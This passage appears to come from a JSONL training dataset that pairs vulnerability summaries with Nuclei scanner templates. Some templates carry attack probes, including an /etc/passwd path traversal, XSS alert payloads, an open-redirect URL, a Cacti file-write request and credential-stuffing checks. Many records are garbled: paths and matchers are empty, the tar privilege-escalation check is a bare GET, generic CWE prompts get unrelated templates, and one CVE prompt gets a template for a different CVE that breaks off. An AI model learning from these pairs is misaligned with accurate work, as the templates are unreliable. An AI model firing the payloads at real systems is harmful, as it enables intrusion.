high\nIndicators: vulnerability detected, error", "output": "id: nextjs-redirect\n\ninfo:\n name: Next.js <1.2.3 - Open Redirect\n author: DhiyaneshDk\n severity: medium\n description: Next.js contains an open redirect via \u201c_next/image\u201d due to improper path parsing.\n tags: redirect,nextjs,xss,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/_next/image?url=/\\/\\interact.sh/&q=100&w=128&h=128\" \n matchers:\n - type: word\n words:\n - \"Location: /\\/\\/interact.sh\" \n part: header\n - type: status\n status:\n - 308", "category": "cwe", "severity": "high", "id": "CWE-601"} {"instruction": "Generate a Nuclei template for: Cacti Weathermap File Write", "input": "Title: Cacti Weathermap File Write\nSummary: Cacti Weathermap File Write. Cacti Weathermap (a plugin for Cacti, an open-source network monitoring and graphing tool) is vulnerable to file write.\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: cacti-weathermap-file-write\n\ninfo:\n name: Cacti Weathermap File Write\n author: pikpikcu\n severity: medium\n description: Cacti Weathermap (a plugin for Cacti, an open-source network monitoring and graphing tool) is vulnerable to file write.\n tags: injection,cacti,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7\" \n matchers:\n - type: status\n status:\n - 200\n - method: GET\n path:\n - \"{{BaseURL}}/plugins/weathermap/configs/poc.conf\" \n matchers:\n - type: word\n words:\n - \"TITLE 46ea1712d4b13b55b3f680cc5b8b54e8\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "cacti-weathermap-file-write"} {"instruction": "Generate a Nuclei template for CVE-2014-2321", "input": "Title: Vulnerability (CWE-264) in zte f460 and others\nSummary: web_shell_cmd.gch on ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests, as demonstrated by using \"set TelnetCfg\" commands to enable a TELNET service with specified credentials.\nVulnerability Type: Vulnerability (CWE-264)\nSeverity: high\nAffected Products: zte f460, zte f660\nIndicators: error, vulnerability detected", "output": "id: CVE-2014-2321\n\ninfo:\n name: ZTE Cable Modem Web Shell\n author: geeknik\n severity: critical\n description: ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests to web_shell_cmd.gch, as demonstrated by using \"set TelnetCfg\" commands to enable a TELNET service with specified credentials.\n tags: cve2014,cve,iot,zte,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/web_shell_cmd.gch\" \n matchers:\n - type: word\n words:\n - \"please input shell command\" \n - \"ZTE Corporation. All rights reserved\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2014-2321"} {"instruction": "Generate a Nuclei template for: tar - Privilege Escalation", "input": "Title: tar - Privilege Escalation\nSummary: tar - Privilege Escalation. tar is a command-line utility used to create and manipulate archive files. It is commonly used for bundling multiple files and directories into a single archive, often used in conjunction with compression tools like gzip or bzip2.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: privesc-tar\n\ninfo:\n name: tar - Privilege Escalation\n author: daffainfo\n severity: high\n description: tar is a command-line utility used to create and manipulate archive files. It is commonly used for bundling multiple files and directories into a single archive, often used in conjunction with compression tools like gzip or bzip2.\n tags: code,linux,tar,privesc,local\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "privesc-tar"} {"instruction": "Generate a Nuclei template for: Secnet Intelligent Routing System actpt_5g.data - Information Leak", "input": "Title: Secnet Intelligent Routing System actpt_5g.data - Information Leak\nSummary: Secnet Intelligent Routing System actpt_5g.data - Information Leak. Secnet Intelligent Routing System is exposed.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: secnet-info-leak\n\ninfo:\n name: Secnet Intelligent Routing System actpt_5g.data - Information Leak\n author: DhiyaneshDk\n severity: high\n description: Secnet Intelligent Routing System is exposed.\n tags: info-leak,secnet,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/actpt_5g.data\" \n matchers:\n - type: word\n words:\n - \"\"http_username\":\" \n - \"\"http_passwd\":\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "secnet-info-leak"} {"instruction": "Generate a Nuclei template to detect Insufficiently Protected Credentials", "input": "Title: Insufficiently Protected Credentials (CWE-522)\nSummary: The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.\nVulnerability Type: Insufficiently Protected Credentials\nSeverity: medium\nIndicators: unauthorized", "output": "id: iotawatt-app-exposure\n\ninfo:\n name: IoTaWatt Configuration App Exposure\n author: pussycat0x\n severity: high\n description: An IoTaWatt configuration app was discovered. Unauthenticated access to an IoTaWatt energy monitor could give a malicious attacker the means to upload to any of several third-party energy websites/database.\n tags: iot,exposure,vuln,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"<h3>Configure IoTaWatt Device</h3>\" \n - \"<title>IoTaWatt Configuration app\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-522"} {"instruction": "Generate a Nuclei template for: SevOne NMS Network Manager", "input": "Title: SevOne NMS Network Manager\nSummary: SevOne NMS Network Manager. Tags: sevone, manager, login\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: sevone-nms-network-manager\n\ninfo:\n name: SevOne NMS Network Manager\n author: pussycat0x\n severity: info\n description: SevOne NMS Network Manager\n tags: sevone,manager,login,panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/#login\" \n matchers:\n - type: word\n words:\n - \"SevOne NMS - Network Manager\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "sevone-nms-network-manager"} {"instruction": "Generate a Nuclei template for CVE-2015-2794", "input": "Title: Vulnerability (CWE-264) in dotnetnuke dotnetnuke\nSummary: The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx.\nVulnerability Type: Vulnerability (CWE-264)\nSeverity: critical\nAffected Products: dotnetnuke dotnetnuke\nIndicators: error, vulnerability detected", "output": "id: CVE-2015-2794\n\ninfo:\n name: DotNetNuke 07.04.00 - Administration Authentication Bypass\n author: 0xr2r\n severity: critical\n description: The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx.\n tags: cve2015,cve,dotnetnuke,auth-bypass,install,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Install/InstallWizard.aspx?__VIEWSTATE\" \n matchers:\n - type: word\n words:\n - \"Administrative Information\" \n - \"Database Information\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2015-2794"} {"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - AngularJS Code", "input": "Title: Content-Security-Policy Bypass - AngularJS Code\nSummary: Content-Security-Policy Bypass - AngularJS Code. Tags: xss, csp-bypass, angularjs-code\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: angularjs-code-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - AngularJS Code\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - AngularJS Code\n tags: xss,csp-bypass,angularjs-code,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"angularjs.org\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "angularjs-code-csp-bypass"} {"instruction": "Generate a Nuclei template for: Detect Basic uPNP Device", "input": "Title: Detect Basic uPNP Device\nSummary: Detect Basic uPNP Device. uPNP Device was detected.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: upnp-device-detect\n\ninfo:\n name: Detect Basic uPNP Device\n author: geeknik\n severity: info\n description: uPNP Device was detected.\n tags: upnp,iot,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"urn:schemas-upnp-org:device-1-0\" \n - \"\" \n - \"\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "upnp-device-detect"} {"instruction": "Generate a Nuclei template for: dropbox phishing Detection", "input": "Title: dropbox phishing Detection\nSummary: dropbox phishing Detection. A dropbox phishing website was detected\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: dropbox-phish\n\ninfo:\n name: dropbox phishing Detection\n author: rxerium\n severity: info\n description: A dropbox phishing website was detected\n tags: phishing,dropbox,osint,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Dropbox is a home for all of your work. You can store and share files, collaborate on projects and bring your best ideas to life, whether you\u2019re working alone or as part of a team.\" \n - type: status\n status:\n - 200\n - type: dsl", "category": "generic", "severity": "info", "id": "dropbox-phish"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: soundcloud\n\ninfo:\n name: SoundCloud User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: SoundCloud user name information check was conducted.\n tags: osint,osint-music,soundcloud,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://soundcloud.com/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"SoundCloud\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Docker Hub Login Check", "input": "Title: Docker Hub Login Check\nSummary: Docker Hub Login Check. Checks for a valid Docker Hub account.\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: docker-hub-login-check\n\ninfo:\n name: Docker Hub Login Check\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks for a valid Docker Hub account.\n tags: creds-stuffing,login-check,cloud,docker,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"token\" \n part: body\n - type: word\n words:\n - \"Set-Cookie: token=\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "critical", "id": "docker-hub-login-check"} {"instruction": "Generate a Nuclei template for: SendBird Access ID", "input": "Title: SendBird Access ID\nSummary: SendBird Access ID. Tags: exposure, token, sendbird\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: sendbird-access-id\n\ninfo:\n name: SendBird Access ID\n author: DhiyaneshDK\n severity: info\n description: SendBird Access ID\n tags: exposure,token,sendbird,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "sendbird-access-id"} {"instruction": "Generate a Nuclei template for: Tinyproxy - Detect", "input": "Title: Tinyproxy - Detect\nSummary: Tinyproxy - Detect. Lightweight HTTP/HTTPS proxy daemon for POSIX operating systems\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: tinyproxy-detect\n\ninfo:\n name: Tinyproxy - Detect\n author: bhutch\n severity: info\n description: Lightweight HTTP/HTTPS proxy daemon for POSIX operating systems\n tags: tech,proxy,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"server: tinyproxy\" \n part: header", "category": "generic", "severity": "info", "id": "tinyproxy-detect"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: pillowfort\n\ninfo:\n name: Pillowfort User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Pillowfort user name information check was conducted.\n tags: osint,osint-social,pillowfort,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.pillowfort.social/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: eol-magento\n\ninfo:\n name: Magento End-of-life Detect\n author: dogancanbakir\n severity: info\n description: Magento end of life detection.\n tags: magento,tech,cms,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2021-25299", "input": "Title: Cross-Site Scripting (XSS) in nagios nagios_xi\nSummary: Nagios XI version xi-5.7.5 is affected by cross-site scripting (XSS). The vulnerability exists in the file /usr/local/nagiosxi/html/admin/sshterm.php due to improper sanitization of user-controlled input. A maliciously crafted URL, when clicked by an admin user, can be used to steal his/her session cookies or it can be chained with the previous bugs to get one-click remote command execution (RCE) on the Nagios XI server.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: nagios nagios_xi\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-25299\n\ninfo:\n name: Nagios XI 5.7.5 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: Nagios XI 5.7.5 contains a cross-site scripting vulnerability in the file /usr/local/nagiosxi/html/admin/sshterm.php, due to improper sanitization of user-controlled input. A maliciously crafted URL, when clicked by an admin user, can be used to steal session cookies, or it can be chained with the previous bugs to get one-click remote command execution on the Nagios XI server.\n tags: cve2021,cve,nagios,nagiosxi,xss,authenticated,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2021-25299"} {"instruction": "Generate a Nuclei template for: Atlassian Bamboo Setup Wizard", "input": "Title: Atlassian Bamboo Setup Wizard\nSummary: Atlassian Bamboo Setup Wizard. Atlassian Bamboo is susceptible to the Installation page exposure due to misconfiguration.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: atlassian-bamboo-setup\n\ninfo:\n name: Atlassian Bamboo Setup Wizard\n author: pussycat0x\n severity: info\n description: Atlassian Bamboo is susceptible to the Installation page exposure due to misconfiguration.\n tags: misconfig,atlassian,bamboo,setup,installer,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/setup/setupLicense.action\" \n matchers:\n - type: word\n words:\n - \"Bamboo setup wizard - Atlassian Bamboo\" \n - \"Bamboo evaluation license\" \n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "atlassian-bamboo-setup"} {"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - AliExpress ACS", "input": "Title: Content-Security-Policy Bypass - AliExpress ACS\nSummary: Content-Security-Policy Bypass - AliExpress ACS. Tags: xss, csp-bypass, aliexpress-acs\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: aliexpress-acs-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - AliExpress ACS\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - AliExpress ACS\n tags: xss,csp-bypass,aliexpress-acs,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"aliexpress.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "aliexpress-acs-csp-bypass"} {"instruction": "Generate a Nuclei template for: OS Patches - Outdated", "input": "Title: OS Patches - Outdated\nSummary: OS Patches - Outdated. Ensure that the latest OS patches for ECS virtual machines (VM) instances are applied in order to mitigate security vulnerabilities and ensure optimal performance and stability.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: os-patches-outdated\n\ninfo:\n name: OS Patches - Outdated\n author: DhiyaneshDK\n severity: medium\n description: Ensure that the latest OS patches for ECS virtual machines (VM) instances are applied in order to mitigate security vulnerabilities and ensure optimal performance and stability.\n tags: cloud,devops,aliyun,alibaba,alibaba-cloud-config,ecs\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "os-patches-outdated"} {"instruction": "Generate a Nuclei template for CVE-2024-10915", "input": "Title: Vulnerability (CWE-74) in dlink dns-320_firmware and others\nSummary: A vulnerability was found in D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L up to 20241028. It has been rated as critical. Affected by this issue is the function cgi_user_add of the file /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. The manipulation of the argument group leads to os command injection. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used.\nVulnerability Type: Vulnerability (CWE-74)\nSeverity: high\nAffected Products: dlink dns-320_firmware, dlink dns-320lw_firmware, dlink dns-325_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-10915\n\ninfo:\n name: D-Link NAS - Command Injection via Group Parameter\n author: s4e-io\n severity: critical\n description: A vulnerability was found in D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L up to 20241028. It has been rated as critical. Affected by this issue is the function cgi_user_add of the file /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. The manipulation of the argument group leads to os command injection.\n tags: cve,cve2024,dlink,sharecenter,rce,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: or\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2024-10915"} {"instruction": "Generate a Nuclei template for CVE-2021-24220", "input": "Title: Unrestricted File Upload in thrivethemes focusblog and others\nSummary: Thrive \u201cLegacy\u201d Rise by Thrive Themes WordPress theme before 2.0.0, Luxe by Thrive Themes WordPress theme before 2.0.0, Minus by Thrive Themes WordPress theme before 2.0.0, Ignition by Thrive Themes WordPress theme before 2.0.0, FocusBlog by Thrive Themes WordPress theme before 2.0.0, Squared by Thrive Themes WordPress theme before 2.0.0, Voice WordPress theme before 2.0.0, Performag by Thrive Themes WordPress theme before 2.0.0, Pressive by Thrive Themes WordPress theme before 2.0.0, Storied by Thrive Themes WordPress theme before 2.0.0 register a REST API endpoint to compress images using the Kraken image optimization engine. By supplying a crafted request in combination with data inserted using the Option Update vulnerability, it was possible to use this endpoint to retrieve malicious code from a remote URL and overwrite an existing file on the site with it or create a new file.This includes executable PHP files that contain malicious code.\nVulnerability Type: Unrestricted File Upload\nSeverity: critical\nAffected Products: thrivethemes focusblog, thrivethemes ignition, thrivethemes luxe\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-24220\n\ninfo:\n name: Multiple Thrive Themes < 2.0.0 - Arbitrary File Upload\n author: pussycat0x\n severity: critical\n description: Thrive \u201cLegacy\u201d Rise by Thrive Themes WordPress theme before 2.0.0, Luxe by Thrive Themes WordPress theme before 2.0.0, Minus by Thrive Themes WordPress theme before 2.0.0, Ignition by Thrive Themes WordPress theme before 2.0.0, FocusBlog by Thrive Themes WordPress theme before 2.0.0, Squared by Thrive Themes WordPress theme before 2.0.0, Voice WordPress theme before 2.0.0, Performag by Thrive Themes WordPress theme before 2.0.0, Pressive by Thrive Themes WordPress theme before 2.0.0, Storied by Thrive Themes WordPress theme before 2.0.0 register a REST API endpoint to compress images using the Kraken image optimization engine. By supplying a crafted request in combination with data inserted using the Option Update vulnerability, it was possible to use this endpoint to retrieve malicious code from a remote URL and overwrite an existing file on the site with it or create a new file.This includes executable PHP files that contain malicious code.\n tags: cve,cve2021,wordpress,wp,wpscan,wp-theme,thrive,passive,vkev\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/themes/{{theme}}/style.css\" \n matchers:\n - type: dsl\n condition: and\n - type: word\n words:\n - \"rise\" \n - \"luxe\" \n - \"minus\" \n - \"ignition\" \n - \"focusblog\" \n - \"squared\" \n - \"voice\" \n - \"performag\" \n - \"pressive\" \n - \"storied\" \n part: body\n condition: or", "category": "cve", "severity": "critical", "id": "CVE-2021-24220"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: wykop\n\ninfo:\n name: Wykop User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Wykop user name information check was conducted.\n tags: osint,osint-social,wykop,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.wykop.pl/ludzie/{{user}}/\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Aktywno\u015b\u0107 u\u017cytkownika\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Unnecessary Service Removal Check", "input": "Title: Unnecessary Service Removal Check\nSummary: Unnecessary Service Removal Check. Ensure that unnecessary services such as Alerter, Clipbook, Messenger, and Simple TCP/IP Services are not running. If enabled, these services can expose the system to security vulnerabilities.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: unnecessary-service-check\n\ninfo:\n name: Unnecessary Service Removal Check\n author: nukunga[SungHyunJeon]\n severity: medium\n description: Ensure that unnecessary services such as Alerter, Clipbook, Messenger, and Simple TCP/IP Services are not running. If enabled, these services can expose the system to security vulnerabilities.\n tags: service-management,code,windows-audit,kisa\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "unnecessary-service-check"} {"instruction": "Generate a Nuclei template for CVE-2018-7193", "input": "Title: Cross-Site Scripting (XSS) in osticket osticket\nSummary: Cross-site scripting (XSS) vulnerability in /scp/directory.php in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the \"order\" parameter.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: osticket osticket\nIndicators: error, vulnerability detected", "output": "id: CVE-2018-7193\n\ninfo:\n name: osTicket < 1.10.2 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: Cross-site scripting (XSS) vulnerability in /scp/directory.php in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the \"order\" parameter.\n tags: cve,cve2018,osticket,xss,authenticated,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2018-7193"} {"instruction": "Generate a Nuclei template for: Cyber Chef Panel - Detect", "input": "Title: Cyber Chef Panel - Detect\nSummary: Cyber Chef Panel - Detect. A Cyber Chef Panel was detected\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: cyberchef-panel\n\ninfo:\n name: Cyber Chef Panel - Detect\n author: rxerium\n severity: info\n description: A Cyber Chef Panel was detected\n tags: panel,cyberchef,login,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"CyberChef\" \n - \"The Cyber Swiss Army Knife\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "cyberchef-panel"} {"instruction": "Generate a Nuclei template to detect Path Traversal", "input": "Title: Path Traversal (CWE-22)\nSummary: The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Many file operations are intended to take place within a restricted directory. By using special elements such as \"..\" and \"/\" separators, attackers can escap\nVulnerability Type: Path Traversal\nSeverity: high\nIndicators: unexpected", "output": "id: opencti-lfi\n\ninfo:\n name: OpenCTI 3.3.1 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: OpenCTI 3.3.1 is vulnerable to local file inclusion.\n tags: opencti,lfi,oss,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/static/css//../../../../../../../../etc/passwd\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cwe", "severity": "high", "id": "CWE-22"} {"instruction": "Generate a Nuclei template for CVE-2021-42551", "input": "Title: Cross-Site Scripting (XSS) in alcoda netbiblio\nSummary: Cross-site Scripting (XSS) vulnerability in the search functionality of AlCoda NetBiblio WebOPAC allows an unauthenticated user to craft a reflected Cross-Site Scripting attack. This issue affects: AlCoda NetBiblio WebOPAC versions prior to 4.0.0.320; versions later than 4.0.0.328. This issue does not affect: AlCoda NetBiblio WebOPAC version 4.0.0.335 and later versions.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: alcoda netbiblio\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-42551\n\ninfo:\n name: NetBiblio WebOPAC - Cross-Site Scripting\n author: compr00t\n severity: medium\n description: NetBiblio WebOPAC before 4.0.0.320 is affected by a reflected cross-site scripting vulnerability in its Wikipedia module through /NetBiblio/search/shortview via the searchTerm parameter.\n tags: cve2021,cve,xss,netbiblio,alcoda,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x\" \n - \"{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F\" \n matchers:\n - type: word\n words:\n - \"SearchTerm: 'x'+alert(1)+'x',\" \n - \"SearchTerm: 'x\\\\'+alert(1),//',\" \n part: body\n condition: or\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: word\n words:\n - \"NetBiblio\" \n part: body\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2021-42551"} {"instruction": "Generate a Nuclei template for: SMB2 Server Time - Detection", "input": "Title: SMB2 Server Time - Detection\nSummary: SMB2 Server Time - Detection. Trying to retrieve the present date of the system along with the initiation date of an SMB2 server.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: smb2-server-time\n\ninfo:\n name: SMB2 Server Time - Detection\n author: DhiyaneshDK\n severity: info\n description: Trying to retrieve the present date of the system along with the initiation date of an SMB2 server.\n tags: js,network,smb,enum,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "smb2-server-time"} {"instruction": "Generate a Nuclei template for CVE-2014-7169", "input": "Title: OS Command Injection in gnu bash and others\nSummary: GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.\nVulnerability Type: OS Command Injection\nSeverity: critical\nAffected Products: gnu bash, arista eos, oracle linux\nIndicators: error, vulnerability detected", "output": "id: CVE-2014-6271\n\ninfo:\n name: ShellShock - Remote Code Execution\n author: pentest_swissky,0xelkomy\n severity: critical\n description: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka ShellShock.\n tags: cve2014,cve,rce,shellshock,kev,gnu,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - 